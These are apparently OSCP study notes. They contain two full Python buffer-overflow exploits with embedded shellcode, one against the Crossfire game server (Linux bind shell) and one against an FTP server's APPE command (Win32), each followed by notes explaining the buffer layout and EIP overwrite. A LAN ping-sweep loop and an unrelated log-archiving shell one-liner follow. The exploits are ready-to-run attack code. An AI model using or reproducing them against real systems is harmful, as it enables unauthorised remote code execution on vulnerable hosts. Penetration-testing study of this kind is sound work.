OSCP: Linux shellcode

----------------------

#!/usr/bin/python

#exploit for crossfire

import socket, sys

host = sys.argv[1]

# 78 bytes

shellcode =("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"

"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"

"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"

"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"

"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"

"\x0b\xcd\x80")

# 4379 bytes

#crash = '\x41' * 4368 + '\x42\x42\x42\x42' + '\x43' * 7

# 0807b8f8 - Indirect Jump

crash = '\x90' * 100 + shellcode + '\x41' * 4190 + '\xf8\xb8\x07\x08' + '\x43' * 7

buffer = '\x11(setup sound ' + crash + '\x90\x00#'

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect((host,13327))

data = s.recv(1024)

print data

s.send(buffer)

s.close()

----------------------

crash = '\x90' * 100 + shellcode + '\x41' * 4190 + '\xf8\xb8\x07\x08' + '\x43' * 7

\x90 NOPs to the shellcode

\x41 a set of As to fill the space until the EIP address

\xf8\xb8\x07\x08 address to the %eax register where the shellcode is stored

\x43 a set of Cs to fill the 4379 bytes length of the BOF

OSCP: shellcode in Win32

---------------------

#!/usr/bin/python

import socket

buffer = 'A' * 2000

shellcode=("\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09"

"\xa3\x87\x03\x83\xeb\xfc\xe2\xf4\xf5\xc9\x6c\x4e\xe1\x5a\x78\xfc"

"\xf6\xc3\x0c\x6f\x2d\x87\x0c\x46\x35\x28\xfb\x06\x71\xa2\x68\x88"

"\x46\xbb\x0c\x5c\x29\xa2\x6c\x4a\x82\x97\x0c\x02\xe7\x92\x47\x9a"

"\xa5\x27\x47\x77\x0e\x62\x4d\x0e\x08\x61\x6c\xf7\x32\xf7\xa3\x2b"

"\x7c\x46\x0c\x5c\x2d\xa2\x6c\x65\x82\xaf\xcc\x88\x56\xbf\x86\xe8"

"\x0a\x8f\x0c\x8a\x65\x87\x9b\x62\xca\x92\x5c\x67\x82\xe0\xb7\x88"

"\x49\xaf\x0c\x73\x15\x0e\x0c\x43\x01\xfd\xef\x8d\x47\xad\x6b\x53"

"\xf6\x75\xe1\x50\x6f\xcb\xb4\x31\x61\xd4\xf4\x31\x56\xf7\x78\xd3"

"\x61\x68\x6a\xff\x32\xf3\x78\xd5\x56\x2a\x62\x65\x88\x4e\x8f\x01"

"\x5c\xc9\x85\xfc\xd9\xcb\x5e\x0a\xfc\x0e\xd0\xfc\xdf\xf0\xd4\x50"

"\x5a\xf0\xc4\x50\x4a\xf0\x78\xd3\x6f\xcb\x96\x5f\x6f\xf0\x0e\xe2"

"\x9c\xcb\x23\x19\x79\x64\xd0\xfc\xdf\xc9\x97\x52\x5c\x5c\x57\x6b"

"\xad\x0e\xa9\xea\x5e\x5c\x51\x50\x5c\x5c\x57\x6b\xec\xea\x01\x4a"

"\x5e\x5c\x51\x53\x5d\xf7\xd2\xfc\xd9\x30\xef\xe4\x70\x65\xfe\x54"

"\xf6\x75\xd2\xfc\xd9\xc5\xed\x67\x6f\xcb\xe4\x6e\x80\x46\xed\x53"

"\x50\x8a\x4b\x8a\xee\xc9\xc3\x8a\xeb\x92\x47\xf0\xa3\x5d\xc5\x2e"

"\xf7\xe1\xab\x90\x84\xd9\xbf\xa8\xa2\x08\xef\x71\xf7\x10\x91\xfc"

"\x7c\xe7\x78\xd5\x52\xf4\xd5\x52\x58\xf2\xed\x02\x58\xf2\xd2\x52"

"\xf6\x73\xef\xae\xd0\xa6\x49\x50\xf6\x75\xed\xfc\xf6\x94\x78\xd3"

"\x82\xf4\x7b\x80\xcd\xc7\x78\xd5\x5b\x5c\x57\x6b\xf9\x29\x83\x5c"

"\x5a\x5c\x51\xfc\xd9\xa3\x87\x03")

# 77D8AF0A

buffer = '\x41' * 966 + '\x0A\xAF\xD8\x77' + '\x43' * 16 + '\x90' * 16 + shellcode + '\x44' * 654

print 'Sending evil buffer....'

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('192.168.11.113',21))

s.recv(1024)

s.send('USER ftp\r\n')

s.recv(1024)

s.send('PASS ftp\r\n')

s.recv(1024)

s.send('APPE ' + buffer + '\r\n')

---------------------

buffer = '\x41' * 966 + '\x0A\xAF\xD8\x77' + '\x43' * 16 + '\x90' * 10 + shellcode

'\x41' * 966 to get EIP

overwrite EIP with JMP ESP from USER32.dll

'\x43' * 16 to get ESP

add some NOPs

put the shellcode

OSCP: script for host discovery on a LAN

# for ip in $(seq 1 254); do ping -c 1 192.168.10.$ip>/dev/null; [ $? -eq 0 ] && echo "192.168.10.$ip UP" || : ; done

[ $? -eq 0 ] && echo "192.168.10.$ip UP" || :

This is a Ternal Operator

if $? (exit status of the last job) is eq 0 echo otherwise do nothing

HOWTO Zip Provider1 logs in ziplogs/

# cd /var/opt/CPmds-R70/customers/XXXX/CPsuite-R70/fw1/log/
# mkdir ziplogs
# for i in $(ls | cut -d '_' -f1 | sort -u) ; do if [ $(expr match $i '2010') = 4 ]; then echo zipping $i; tar -cf - $i* | gzip -c > $i.tgz; mv $i.tgz ziplogs/.; rm -rf $i*; fi; done